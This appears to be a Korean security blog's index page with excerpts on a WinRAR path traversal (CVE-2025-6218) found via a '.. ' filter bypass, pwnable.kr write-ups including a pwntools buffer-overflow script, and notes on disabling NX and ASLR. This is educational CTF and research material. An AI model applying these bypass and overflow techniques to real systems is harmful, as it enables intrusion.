728x90

분류 전체보기 179

CVE-2025-6218 분석

화이트햇 스쿨 3기 프로젝트 하면서 winrar 취약점을 발견하게 되어서 어떻게 찾게 되었고, 분석은 어떻게 했는지에 대한 글입니다.제 글이 이 글을 읽는 여러분에게도 도움이 되었으면 좋겠습니다. 취약점을 발견한 방법A 프로그램에서 path traversal 우회 했던 방법을 가지고, 압축 프로그램 테스트를 하다가 운이 좋게 발견을 했습니다.(그때 새벽이 였는데, 10시간 투자해서 명예와 돈을 가지게 되었네요. 심지어 다른 압축 프로그램에서 되는 것도 있고)그래서, A 프로그램에서 취약점을 발견한 방법이 곧 취약점을 발견한 방법이 되겠습니다A 프로그램에서는 .. 만 필터링 하고, ..(공백)을 넣으면 우회를 할 수 있지 않을까? 하는 단순한 생각으로 접근을 했습니다.하지만 A 프로그램은 압축 프로그램..

System Hacking/cve 2025.08.07

[pwnable.kr] bof

소스코드스택은 낮은 주소에서 높은 주소로 overflow가 가능하다. 풀이key는 ebp+0x8에 위치한다.overflowme는 ebp-0xc에 위치한다.2c + 8 = 0x34from pwn import *r = ssh(host="pwnable.kr", user="bof", password="guest", port=2222)p = r.run("/bin/sh")p.sendline("nc 0 9000")key = 0xcafebabepayload = b'A' * 52 + p32(key)p.sendline(payload)p.interactive()readme 확인을 안해서 쉘을 따도 플래그가 안보여서 다른 분이 쓴 write-up 참고함

Linux NX & ASLR & Canaries & PIE

NX프로레스 명령어나 코드 또는 데이터 저장을 위한 메모리 영역을 따로 분리하는 CPU의 기술NX 특성으로 지정된 모든 메모리 구역은 데이터 저장을 위해서만 사용되고, 프로세서 명령어가 그 곳에 상주하지 않음으로써 실행되지 않도록 만들어 준다ex) 공격자가 Heap, Stack 영역에 shellcode를 저장해서 실행하기 위해서는 해당 영역에 실행권한이 있어야한다.NX 비활성화 옵션 : gcc -z execstack ASLRASLR(Address Space Layout Randomization)스택, 힙, 라이브러리, 등의 주소를 랜덤한 영역에 배치하여, 공격에 필요한 target address를 예측하기 어렵게 만든다.프로그램이 실행 될 때마다 각 주소들이 변경이 된다.echo 0 > /proc/sys..

[pwnable.kr] fd

처음 이세계에 가면 슬라임을 잡듯이 여기도 슬라임이 맨 처음 문제이다.저는 wsl을 사용을 하기 때문에, ssh fd@pwnable.kr -p2222 접속을 하고 시작하면 되겠습니다.ls 명령어를 통해서, 현재 디렉토리에서 파일이 어떤 것이 있는지 확인을 합니다.fd , fd.c , flag 파일이 있습니다. 어차피 cat flag 해도 flag는 출력이 안될것 같으니, 바로 소스코드를 확인을 했습니다.system("/bin/cat flag"); 를 실행을 하도록 해당 조건문으로 진입을 하게 하면 될 것 같습니다.여기서 이 코드들이 핵심입니다.int fd = atoi( argv[1] ) - 0x1234;int len = 0;len = read(fd, buf, 32);if(!strcmp("LETMEWIN\..

728x90